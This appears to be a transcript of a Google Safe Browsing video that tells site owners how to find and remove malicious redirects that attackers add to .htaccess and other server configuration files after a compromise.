[music playing] hi. i'm lucas ballard. i'm a software engineer atgoogle, and i work on google safe browsing. i'd like to provide moreinformation for site owners who are notified that theirsite was infected with malware, specifically with thetype "server configuration." so that we're all on the samepage, if your site is infected
with malware, you can see sampleinfected urls and the type of infection when youverify ownership of your site in google webmaster tools. google webmaster toolscan be found at google.com/webmasters. when webmaster tools indicatesthe malware type "server configuration," it often meansthat the hacker is redirecting visitors from your good siteto their attack site by modifying your server'sconfiguration files.
server configuration files allowthe site administrator to specify, among other things,access permissions and url redirects for specificpages or directories on a website. you can imagine that cybercriminals might modify this file to suit their own needs. to investigate the specificbehavior on your site, log in to webmaster tools and browsethrough the malware section. make note of the sample urlslisted with malware type
"server configuration." thesesample urls are pages that no longer consistently serve yoursite's good content. instead, because a cybercriminal likely placed a redirect in the serverconfiguration file, these urls redirect your usersto an attack site. you can use wget ourcurl to check for the redirect behavior. remember, your site will needto be back online first. if the sample urls copied fromwebmaster tools don't redirect
as expected, the hacker may havetried more sophisticated techniques to avoid detection. for example, she may haveintended for the redirect to only given certain refers oruser agents, such as to avoid showing content to automatedprograms that might detect it. you'll want your wget or curlcommands to reflect these possibilities. to further investigate howyour site was affected by malware type "serverconfiguration," log into your
web server's file system. in my investigation, i'lluse the htaccess server configuration file. htaccess is common on manyapache-based web servers, as is httpd.conf. if your web server isn'tapache-based, say it's iis, then please perform similartasks with your server's equivalent configurationfiles. in the directory where the dothtaccess file exists, i'll
perform ls-al, or a similarcommand to view all the files, including hidden fileslike .htaccess. the .htaccess controls behavioron the current directory and potentiallyon subdirectories. there may exist more thanone server configuration file on your site. you can view relevant serverconfiguration files, perhaps through an editor like vi, andcheck for unwanted directives such as redirects.
for example, as mentionedearlier, to better hide malicious content, the hackermay have configured conditional redirects based onrefer, operating system, user agent, browser, et cetera. or the hacker may configureredirects to unknown sites, likely malware attack sites. be sure to check the entire filein case the hacker added their code at the end of thefile where she hoped you wouldn't notice.
the sample server configurationurl should have a corresponding rule in the.htaccess file or other server configuration files. when you're ready to clean upyour server configuration files, which occurs in thefollowing step of our hacked site recovery process, you caneither replace a file with a known good backup, or you candelete the unwanted code from the existing file. be aware that only fixing theserver configuration file
isn't enough. it won't correct the underlyingvulnerability that allowed the hacker to compromiseyour site in the first place. furthermore, the hacker may haveleft a back door on your server for future reentry ifyou fail to delete it. before finishing the step, besure to check out our file system damage assessment videoto investigate your site for back doors and other harm.
i hope this has been helpful inrestoring a healthy server configuration file aftera malware infection. thanks for watching.